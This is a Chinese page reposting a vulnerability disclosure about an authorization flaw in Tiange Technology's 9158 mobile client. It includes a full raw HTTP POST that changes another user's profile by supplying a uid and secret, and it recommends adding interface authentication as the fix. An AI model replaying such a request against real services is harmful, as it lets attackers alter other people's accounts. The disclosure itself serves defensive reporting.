来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 天格科技某处越权漏洞可修改任意账户资料详细说明:问题存在于天格科技的苹果客户端。安卓下目测存在同样的问题。下载方式位于http: mobile 9158 com 或直接91助手搜索9158进入客户端,...
天格科技某处越权漏洞可修改任意账户资料 问题存在于天格科技的苹果客户端。安卓下目测存在同样的问题。
POST /user/updateInfo_new.aspx? HTTP/1.1 Host: mobile.9158.com Proxy-Connection: keep-alive Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Accept-Language: zh-cn Accept: */* Pragma: no-cache Content-Length: 827 Connection: keep-alive User-Agent: ChatRoom/1.0.7 CFNetwork/609.1.4 Darwin/13.0.0 --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="uid" 30400 --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="secret" d37ab3012c38a3ad1b96e90dffc1d0cc --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="city" o??Y --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="name" VIP?úê??úàí --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="gender" 0 --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="birthday" 19910101 --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw Content-Disposition: form-data; name="province" ???- --293iosfksdfkiowjksdf31jsiuwq003s02dsaffafass3qw
修复方案:添加接口认证 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com